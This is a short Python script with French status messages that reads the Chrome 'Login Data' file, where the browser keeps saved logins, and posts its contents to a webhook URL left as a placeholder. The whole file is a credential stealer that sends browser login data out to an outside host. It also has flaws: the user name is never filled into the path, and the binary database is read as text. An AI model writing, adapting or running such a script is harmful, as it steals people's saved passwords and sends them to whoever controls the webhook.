import requests
import os

user = os.getlogin()
webhook_url = "YOUR WEBNHOOK"
txt_file_path = r"C:\Users\{user}\AppData\Local\Google\Chrome\User Data\Default\Login Data"

try:
    with open(txt_file_path, "r") as file:
        content = file.read()

    data = {"content": content}

    response = requests.post(webhook_url, json=data)

    
    if response.status_code == 200:
        print("Contenu du fichier envoyé avec succès.")
    else:
        print(f"Erreur lors de l'envoi du contenu. Code d'état : {response.status_code}")

except FileNotFoundError:
    print(f"Fichier introuvable à l'emplacement : {txt_file_path}")

except Exception as e:
    print(f"Une erreur s'est produite : {str(e)}")